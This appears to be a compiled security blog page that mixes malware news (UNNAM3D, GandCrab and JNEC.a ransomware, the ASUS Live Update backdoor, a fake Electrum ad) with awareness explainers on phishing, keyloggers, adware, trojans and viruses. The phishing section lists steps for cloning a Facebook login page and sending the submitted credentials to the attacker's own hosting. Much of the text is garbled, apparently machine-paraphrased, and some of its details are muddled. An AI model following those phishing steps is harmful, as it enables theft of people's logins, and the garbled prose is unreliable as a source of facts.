UNNAM3D Ransomware Locks Protected Files, Gift Cards Requesting

A new ransomware is being distributed by email called Unnam3d R@nsomware to move the victim's files in a RAR password - protected archive. The ransomware requires a gift card code of $ 50 from the Amazon so you can get the password archive.
After a victim had submitted the ransomware to our site and asked for help, Bleepingcomputer was warned. While you said you received ransomware through email, you did n't provide a sample of the email you received.

When executed, the ransomware is extracted from bundled WinRar.exe to the Temp% folder and executed the Temp% command \WinRar.exe -m -r -p[password ] [ directory ] for moving files to a password protected file in the specified directory.

During this process, the ransomware moves files into their own individual RAR archives under the Documents, Pictures and Desktop folders. After completion of the ransomware, the Rasom Note screen appears as shown below.
Rasom Note

How This Ransomware To spread ?

As mentioned above, UNNAM3D ransomware can be distributed with malicious attachments via e-mail spam. The email is disguised as an Adobe email that says that the Adobe Flash Player of the recipient is obsolete and must be updated. These messages contain a link to the fake UNNAM3D ransomware update for Adobe Flash Player.
Spam Email
IOCs :
a98b678578e4d937de8a1f1557286da6df74abac0b49081829a81c886c3a92a3
Analyses Report by VirusTotal.

More Info Going to Bleeping Computer

Related Articles:

How to prevent ransomware ?



A 5 million user profiles were exposed by Rela, Chinese lesbian dating app

A popular gay and queer dating app, Rela (alias), has unveiled millions of private data and user profiles, because a server is not password protected.

Rela,Chinese lesbian dating app

Victor Gevers
, a Netherlands security researcher and database providing 5.3 million user profiles for Rela, a popular gay and queer Chinese dating app. Nicknames, birth dates, height, weight, ethnicity, sex preferences, interests and, in some cases, location were included in the profiles. The data was found on a non-password-protected server. Gevers believes that since June 2018 user data have been exposed .

MORE INFO: Techcrunch

Unfortunately, Google promoted a malicious Bitcoin wallet on Youtube

According to the Reddit posting published on March 26, Youtube Video - sharing Platform reportedly ran a malicious ad for Bitcoin (BTC) wallet Electrum for mistakes.
Viewing persons interested in advertising were referred via a common scamming method called typosquatting or URL hijacking to a malicious link. The Reddit post warned the public about promoting a malware version of Elektrum by a user named mrsxeplatypus, describes how the scam ad worked:
malicious video Add
malicious Bitcoin
The malicious ad is covered as a real Electrum ad (except a man whose Russian accent is distorted and who explains what to do). You even need to go to the correct link in the video (electrum.org), but you can start downloading the bad EXE file immediately when you click on the ad. As you can see in the image, electrum.org is the URL to which I have been sent, not electrum.org.

The publication reached Google to check that the advertisement was true with this story reported in The Hard Fork. A representative answered the information request and said that, after the ad was reported to them, "appropriate action" was taken.


Asus Live Update Pushed 1 million PCs of Malware.

It is believed that Taywan based technology - giant ASUS has trusted its automated softws update tool to push the malws to hundreds of thousands of customers when attackers have affected the company's server and used it to push the software to the machines.

The investigators estimate half a million Windows machines have received the malicious backdoor via the ASUS update server, but only about 600 of these systems appear to be targeted. The malware has searched through their unique MAC addresses for targeted systems. Once on a system, the malware reached a control and control server that operated the attackers and installed additional malware on those machines, if it found one of these target addresses.
malwaretechno
The security firm Kaspersky writes a blog post about how hackers gained access to Asus Live Update Utility – the Software Update for Asus notebooks and PCs – to install a backdoor on machines worldwide.

Gandcrab Rasomware. How to Infected PC?

GandCrab is one ransomware form, which in recent years has spread rapidly. Ransomware has been one of the most serious cyber threats organizations are currently facing. Regardless of the sized or small number of companies in their business, hackers target the data that lives on your computer systems.

GandCrab Ransomware is a ransomwara encryptive file that encrypts your victim's personal documents using the RSA-2048 key, then displays the message that can be used to decrypt the data when a payment of $1200 (in Bitcoint or DASH) is made. It can be used for the encryption of your victim's personal data. The commands are placed in the* -DECRYPT.txt or* -DECRYPT.html files on the victims desktop.
GandCrab Rasomware

Ransom Note

Encrypt Files

How to Infect System?

Spam emails containing infected attachments or links to malicious web sites are distributed to the gandcrab ransomware. Cyber criminals spam an email with forged headers to make you believe it was a shipping company like DHL or FedEx. The email tells you they tried to send you a package, but for some reason it failed. Sometimes the emails claim to have been shipping notifications. You can't refuse to be curious about what the email refers to, anyway, and open the attached file (or click on an inside email link). And with this, the GandCrab ransomware infects your computer.


















 

JNEC.a Spread Ransomware by WinRAR Ace Exploit.

A new ransomware called JNEC.a is used to exploit a recently reported code execution ACE vulnerability in WinRAR. After encrypting your computer, a Gmail address will be generated which victims must create to receive the decryption key once the ransom is paid for.
The ransomware encrypts the computer files once running and adds the. Jnec extension to the original file. The price is 0,05 bitcoins (around $ 200) for the decryption key.
JNEC.a Rasomware
While it is in the ransom note, the address has not yet been registered. This task comes under the victims ' control if after paying their ransom they wish to recover their files.

The malware author also provides clear instructions on how to create a certain Gmail address in order to make sure victims can understand how to recover their data, as these can be found in a JNec. README.TXT ransomware note.
Ransom Note
Qihoo 360 Threat Intelligence Center researchers found in the wild the "vk 4221345.rar" archive that supplies JNEC.a with a vulnerable version of WinRAR, which has been released in all of them over the past 19 years.
FILES DETAILS:


IOCs
RAR Archive: 551541d5a9e2418b382e331382ce1e34ddbd92f11772a5d39a4aeb36f89b315e Ransomware: d3f74955d9a69678b0fabb4cc0e298fb0909a96ea68865871364578d99cd8025
File Path: %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\GoogleUpdate.exe

Files Analysis by VirusTotal and App.Any.Run 











What is phishing? How to Attack in Your System.

Phishing scams you with the links to steal your important information. It might be an e-mail that looks like it was sent by a bank or a link that appears to force you to sign into your account again. In this case, the sender will gain access to your accounts and important information by directing you to a website or link and sharing your account details.
Phishing is one of the best way of stealing username and password from people We can create a real page for any login page during this attack.
Phishing Attack Example:
  • Go to Facebook website Log-in, register or find out more
  • right click on the page and select the source page 
  •  copy the code to your notepad 
  •  change the GET & POST method actions in the copied code 
  •  write your hosting address in methods 
  •  get free web hosting account 
  •  when the user tries to login to the username and password page of your account and the user goes to the original Facebook page to get some Html tricks.
  • only for reading/example don't try this trick this is illegal activity.
This trick to your account information access scammers. so carefully check all website link and use its. 

Amazon Phishing Web Site 

What is phishing attack?

Phishing is a type of social engineering attack that is often used to steal user data, including login credentials and credit card numbers. It happens if an attacker masks a victim by opening an email, immediate message or a text message as a trustworthy entity. The recipient is then tricked into clicking a malicious link, which can lead to malware installation, system freezing as part of a ransomware attack, or revealing sensitive information.
Phishing Scam
The results of an attack may be devastating. This includes unauthorized buying, money - robbery or theft for individuals.

Types of Phishing Attacks:

Some Phishing Technic use Attacker's.
  • Deceptive phishing: A disappointing email message is today the most common method of broadcasting. Messages about the need to verify account information, system failure requiring users to re-enter their information, fictitious account charges, undesirable account changes, new free services requiring quick action, and many other scams are broadcast to a wide group of recipients with the hope that the unwary will respond by clicking a link to or signing onto a bogus site where their confidential information can be collected
  • Phishing based on Malware:This includes scams that include malicious software running on users ' PCs. Malware can be introduced as an e - mail attachment, as a Website downloadable file, or through the use of known security vulnerabilities.
  • Keyloggers & Screenloggers: They are malware that track keyboard input and send the pertinent data via the internet to the hacker.
  • Session Hijacking :This attack will monitor users ' activities until they sign up and establish their true credentials in a target account or transaction. It will be a problem. In this stage the malicious software takes over and without user knowledge can take unauthorized steps, for example transfer of funds.
  • Trojans of the Web :When users try to login, they pop up invisibly. Locally they collect the identity of the user and send it to the Hacker.
  • System Reconfiguration : Attacks change user's PC settings for malicious purposes.
  • Phishing based on DNS (' Pharming ') :This is the term used to change the file or DNS files on host sites. Hackers manipulate host files or the domain name system to return bugger addresses for requests for URLs or name services and then direct communicating with the company to a false site.
  • Content - Injection Phishing : It describes the situation in which hackers replace a portion of their content with false content to mislead or mislead the user to give confidence to the hacker.
  • Man-in-the-Middle Phishing :Hackers themselves place the user between the legitimate website and system in these attacks. They record the entry but continue to pass the information so that it does not affect user transactions.
  • Search engine phishing : Phishers create websites with attractive offers that are legally indexed with search engines. The website is normally searched for products or services by users, and their information is fooled.

Phishing Prevention Best Practices:

  1. Know how to identify Phishing Scams Mail: The email you are receiving may seem legitimate because there is to have a true image of the company, but it is best to research your company before you believe anything in it.
  2. The Mail source is here: If you have mail from any financial institution like the bank, make sure you are never asked to send any confidential information like passwords or account details. Instead of responding to the questions it is best to call the bank, to know if they sent the mail from the number you have. 
  3. Never click on the links in an E-mail: never click on the links in an email because they might be a fake link to a website that might be harmful. It is better to type your own web address rather than clicking on it.
  4. Website is secure: it is best to check whether the website is secure enough to trust before entering any data on the website. The easy way is to see whether or not the URL is locked by the green pad.
  5. Phishing is not only restricted to online banks: phishing attacks are usually perpetrated to obtain bank details, but not limited to that. Some of these cyber criminals are also on their listed on other popular websites like Facebook, PayPal, eBay and Amazón.
  6. Update your computer security: Do not compromise the security steps. Always update your computer's security software since they are very useful to block frequent attacks of this kind.
  7. Gradually monitor your account: it is best to continue to check your bank accounts from time to time so that you can know that your transaction is the one you made or not.
  8. Phishing attacks can be carried out in any language: Phishing emails are not supplied to your email box in a language called "English," but can be sent in various languages. Be careful, if you find any mail in the language you don't know or never visited that language's website. 
  9. Trust the Good Instinct: If you have any doubts about this mail, it will mostly be.
  10. Keep yourself up to date: several blogs and articles are writte daily, and it is best for you, through any blog, news or social media platforms such as Facebook or Twitter, to be updated with the latest attacks and scambers on the market.

Phishing Related blogs:

What Is Keylogger?


Keylogger is the software that tracks keystrokes and records keystrokes and sends e - mails to victims.
Keylogger is spyware which is installed on a computer or spy device and which is connected to the computer. The basic keylogger saves all text typed with a keyboard computer. Advanced models have more features, such as taking screenshots, email reports, browsing history and apps. 
Most people define Keylogger as a software to secretly track and log all keystrokes in their own computers.
Keylogger

How to install Keylogger: 

It could be installed simply as a software or e - mailed or as a .jpg file.

How does it work:

  1. Keylogger is a very small program which runs without the owner knowledge in the background, saving the keyboard for all keystrokes.
  2. It sends the keystroke log file to a specific email address or server.
  3. There is a "master key" for accessing the keylogger. Which is a multiple keystrokes combination.
  4. When you enter your browser on www.gmail.com, it's obvious that after that after that after that after that you'll enter your email Id and password. The keystrokes will be sent to the predefined address after that keylogger.
  5. Therefore, someone with basic computer knowledge can easily obtain the email identification and password.

How can I obtain a keylogger?

Keyloggers spread similarly to other malicious programs. Without exception when you buy and install keyloggers by a jealous spouse or partner, and use the security services to keyloggers, your system will install keyloggers, when opening a file attachment that you receive via email, text message, P2P networks, instant message, or social networks. You may also only install keyloggers if the site is infected by a visit to a site. 

How to protect against keyloggers:


  1. Using an authentication time password or two steps.
  2. A proactive protection system is used to detect malicious programs
  3. With the use of virtual keys.
  4. Keep Change Password.
  5. Use Firewall.
  6. Install a good Antivirus Product with the latest virus definitions.
  7. Don't Download and Use Freeware Software.

Buy thousands of followers for any social network!

What is a PUA Or PUP software?

PUA means potentially unwanted applications and PUP means potentially unwanted programs, which are basically the same. Both software items are mainly entered on the computer without the user's consent.It comes with freeware software sometimes.

Also called adware are PUA or PUPs. PUA and PUPs will display unwanted ads, redirect your browser to unwanted websites and undesirable search engines.Some also perform several background processes, slowing down the PC or showing several ads.
You must always install the major software by selecting advanced / specific options to avoid installing such PUA or PUPs. You may not want to install software on your computer by clicking the Next of Quick install button.
PUPs and PUA
This installer  install Unwanted Program like Search Engine and Search Tool Bar in Browser, and install other program which You don't know want.
Some sign show your PC infected with PUA or PUPs Malware:
  • Slow PC speed.
  • Show unwanted ads.
  • Redirect browser.
  • Browser search engine change and redirect.
  • Show unwanted pop-pups
  • Install freeware software show offer pop-pup.Iinstall unwanted toolbar in browser.
PUA or PUPs Prevent Tips:
  • Don't Download and Use Freeware Software.
  • Use Up to date Antivirus.
  • Use Up to date software .
  • Don't Use malicious URL.
  • Unwanted Browser Tool Bar Remove its.
  • Phishing Mail and URL Don't Open. 

How to prevent ransomware ?

What Is Ransomware ?

Ransomware is a malicious software that encrypts files and locks devices, such as a computer, tablet or smartphone, and then demands a ransom to unlock it. Recently, a dangerous ransomware called ' Wannacry ' has affected computers around the world, creating the world's largest ransomware attack ever seen.
Rasomware show Rasom Note . Ransom is usually required in a cryptocurrency form, at a price that increases after one or more deadlines. If the victim fails to pay the final deadline, the data will be encrypted forever.
How To Deal With Rasomware :
Rasomware Show Note
Encrypt File And Rasom Note
The Cause Of Ransomware

Usually the main cause of hacks is human error. Some employees may not know what suspicious emails look like and can give hackers immediate access to sensitive data and company servers simply by following a fake link and entering personal details.

Ransomware Prevent Tips 
Preparing your machine with the following tips is the best way to prevent ransomware from hitting your computer:

  • Backup Your System Daily and Create Restore Point.
  • Use Chrome or Firefox up - to - date versions
  • Keep Adobe updated
  • Don't open source attachments you don't know
  • Don't open PDFs you don't know from sources
  • Do not open the extension of the attachments (exe, com, lnk, mhf, bat, ps1, scr)
  • Do not open suspicious or phishing emails
  • Don't use software that is pirated.
  • Macros disabled.
  • Deactivate flash and java.
  • It’s always necessary to have an antivirus installed in your computer and install update.Do not pay ransom even when locked

How to get rid of browser hijacker?

What Is Browser Hijacker ?


Browser Hijacker Virus is a small piece of software that mostly attacks your favorite browsers, like Mozilla Firefox, Google Chrome, Internet Explorer, etc. Once invaded, this nasty browser hijacker infection will alter your searches and display some error pages on your browser. It will also redirect its user to its own page, which has any intention of visiting.

Without your knowledge, browser hijackers change your browser settings. This is usually done for the purpose of short - term malicious advertising or malvertising.

Browser hijackers may even include other malicious software, such as spyware or keyloggers, capable of recording and transmitting your sensitive information, such as your banking data and credentials online. They can also divert your browsing traffic to malicious websites that are filled with quizzes, surveys, and raffles used to acquire your personal information.

How hijackers of browsers infect your computer ?

Browser hijacking software can sneak into a variety of different computers. It can be installed through "add - ons" free software, malicious websites, ad clicks and browser extensions.
This steps are Effect on Your Browser:
  1.  Feed on many pop-ups and ads that malvertise you.
  2.  Change to a new website your browser. For instance it changes from Google to another search engine your default homepage. 
  3.  Return to a specific website constantly, like an online store. This is known as a DNS deportation. 

Signs Your Browser Has Been Hijacked   

Signs of a browser hijacker infection on your computer include:
  1. The home page has been modified
  2. The default search engine will be changed
  3. You can not navigate to certain web pages, such as security software home pages
  4. You are redirected to pages you never intended to visit
  5. You can see advertisements or ads appearing on your screen. Not accessed through the website
  6. New toolbars have been added
  7. New Favorites or bookmarks are added to this.
  8. The slow running of your web browser.

Known hijackers for browsers:

     1. Mind Spark Tool Bar

Best VPN

 Mindspark Toolbar is a PC - bundled browser extension without the permission of the User.
Mindspark Toolbar changes your search engine to Ask and replaces search results. During your browsing process, Mindspark Toolbar can display many publications, cuts and banners. It collects information and analyzes it confidentially. You may transfer your personal information to third parties.
MindSpark Toolbar
You must immediately uninstall Mindspark Toolbar if you find it on your PC!
How to get rid of Mind Spark Toolbar Click Here

2. Baby lone Toolbar

In 2011, the toolbar Babylon began to circulate. The CNET website, download.com, started to bundle the software without the developer's consent with downloads. In its default browser the Babylon Toolbar has changed to search.babylon.com and infected other browers on the machine. The Babylon Toolbar is now available.
Babylon Toolbar


The toolbar was an adware form, ads in search results displayed, and money from supported links was collected . If you find the Babylon Toolbar on your PC, you must uninstall it immediately!


3. Conduit


Conduit Toolbar is a browser hijacker which is promoted through bundles with apps from third parties, then adds the Conduit Toolbar and changes the user's browser and default search engine to "search.conduit.com" This indicates an attempt to access Conduit Toolbar.
Conduit Toolbar.
You must immediately uninstall Conduit Toolbar if you find it on your PC.
Remove Conduit Toolbar Click Here

Some Other Popular Browser Hijacker :

  • MySearch
  • CoolWebSearch
  • Nationzoom.com
  • Qvo6.com
  • Delta Search
  • OneWebSearch
  • Searchnu.com
  • astromenda.com
  • Snap.do

What Is Adware? How to Infect Your System.



Adware Definition:

Adware is a Malware term. Adware is a software that displays unwanted ads. It might also be a other kind of free software that is supported by advertisements that usually appears on your computer or browser in a pop-up window. Most adware is annoying, but secure. But some are used to collect your personal information, track your visiting websites, or even record your keystrokes.

Wherever adware generally comes from.

Like with malware, adware is generally included within the free software but can be installed through a security hole in your browser or operating system.
Adware Techno


Here are a few typical signs of adware on your system:

  • In places advertising are not supposed to be. 
  • Your web browser's homepage has changed unexpectedly without your permission. 
  • The web pages you typically visit are not displayed properly. 
  • Website links redirect to sites other than what you expected. 
  • A crawl will slow down your web browser. 
  • Your browser suddenly gets new toolbars, extensions or plugins

How To prevent Adware?

Here some things use and avoid adware:
  • Don't Use Freeware Software.
  • Update window time to time.
  • Don't Browse malicious Web site.
  • Use anti malware tool and update and scan daily system.
  •  Don't install unwanted software.
  •  

What Is Trojan Virus ? How To Infect PC.

A Trojan horse or Trojan is a type of malware that is often disguised as legitimate software. Trojans can be employed by cyber-thieves and hackers trying to gain access to users' systems. Users are typically tricked by some form of social engineering into loading and executing Trojans on their systems. Once activated, Trojans can enable cyber-criminals to spy on you, steal your sensitive data, and gain backdoor access to your system.
    These actions can include:
  • Deleting data
  • Blocking data
  • Modifying data
  • Copying data
  • Disrupting the performance of computers or computer networks
     Dissimilar to PC Virus and worms, Trojans are not ready to self-reproduce.

     
Malware techno

  Uses of a Trojan horse
  • When a Trojan horse becomes active, it puts sensitive user data at risk and can negatively impact performance. Once a Trojan has been transferred, it can:
  • Give the attacker backdoor control over the computing device.
  • Record keyboard strokes to steal the user's account data and browsing history.
  • Download and install a virus or worm to exploit a vulnerability in another program.
  • Install ransomware to encrypt the user's data and extort money for the decryption key.
  • Activate the computing device's camera and recording capabilities.
  • Turn the computer into a zombie bot that can be used to carry out click fraud schemes or illegal actions.
  • Legally capture information relevant to a criminal investigation for law enforcement.  
      Trojans are Classified according to the type of action that can perform in PC.
  1. Backdoor : A backdoor, in computing, is a method of bypassing authentication in a piece of software or computer system which can be used for accessing the software without being detected.Backdoor is a Subcategory of Trojans. and Trojan of Category of Malware .Web server backdoors are used for a number of malicious activities, including:
  • Data theft
  • Website defacing
  • Server hijacking
  • The launching of distributed denial of service (DDoS) attacks
  • Infecting website visitors (watering hole attacks)
  • Advanced persistent threat (APT) assaults.

Top 8 symptoms are show your PC infected of malware

Do you know how to tell if your computer has a virus? Sometimes there's no way to be sure, but often computers give hints that something isn't right. Check your computer for the symptoms below to make sure it is secure and not at risk from a virus.

Here are some signs that your device might already be infected with malware:

1. Slower Internet and Processing

A slower computer doesn't necessarily mean you have a virus, but if it's a sudden enough change in speed, it may be worth checking out. Use a speed test to check your internet speed and use your computer's task manager to measure processing power. If either seem slower than usual, perform a scan with your antivirus software.

2. Unexpected Computer Behavior

Viruses can do all kinds of strange things to your computer. If your computer stops responding to clicks, decides to open files on its own, scrolls or acts as if a key's been pressed when it hasn't, you may be experiencing computer virus symptoms. Your computer shouldn't seem like it's thinking for itself.

3. Sudden Freezes & Crashes

Because viruses damage your hard drive, they can cause your computer to experience a catastrophic failure. If you're lucky enough that your computer still turns on after a crash, make sure to run antivirus software to determine whether a virus was the cause.

4. Error Messages

Your computer knows something is wrong before you do. One of the most noticeable symptoms of a computer virus is the sudden appearance of pop-up messages warning you about missing system or application files. Research messages by putting them in a search engine to see if you can diagnose a virus.

5. Advertisements

It's common to see ads as you browse the internet, but if you start seeing them when you're not actively browsing, that is a telltale sign of a virus. Do not click on these ads, even if they say they are for antivirus software.

6. Outgoing Emails

Viruses try to spread themselves by email. If you notice emails in your sent box that you didn't send, you probably have a virus. If you get an email from a friend that seems suspicious, they might have a virus. Do not click on any links or open any attachments in questionable emails.

7. Missing or Extra Files

Keep track of the size of your hard drive. A virus may install copies of itself or unwanted files on your computer. Viruses also delete files unexpectedly. When you start seeing something strange or missing, it's time to run a virus scan.

8. Hardware and Accessory Problems

If you suddenly have a problem with your computer's display, such as mixing pixels or color problems, this can be a sign of a virus messing with your system. A networked printer may also start acting up if it becomes infected.

If you notice any of these, first, don’t panic. It’s not 100% that you have a virus. However, you should check things out. Make sure your antivirus program is scanning your computer regularly and set to automatically download software updates. This is one of the best lines of defense you have against malware.

Computer Virus

What Means Computer Virus? How to Infect Your PC:


A computer virus is a malicious software program loaded onto a user’s computer without the user’s knowledge and performs malicious actions.A Computer Virus is a malicious software program “Malware” that can infect a computer by modifying or deleting data files, boot sector of a hard disk drive or causes a software program to work in an unexpected manner”.
A computer virus resides on a host computer and can replicate itself when executed. Virus can steal user data, delete or modify files & documents, records keystrokes & web sessions of a user. It can also steal or damage hard disk space, it can slowdown CPU processing.
Malware-techno 

Some Different Types of Viruses:

  1. Boot Sector Virus: This Virus infected by system boot sector Remove Boot Programs.
  2. File Viruses: A File Deleting Virus is designed to delete critical files which are the part of Operating System or data files.
  3. Macro Virus: These viruses are triggered when a program capable of executing a macro is run. For example, macro virus can be contained in spreadsheet files. These are written in high-level language like Visual Basic.
  4. Browser Hijacker: This virus Change your browser home page and Redirect other page and show unwanted Pop-Pup and ads.
  5. FAT Virus: FAT viruses ruin your file allocation system, which is where information about files and where to find them exists. It even destroys files and the entire directories for them.
  6. Multipartite Virus: This type of virus is able to infect multiple parts of a system including boot sector, memory and files. This makes it difficult to detect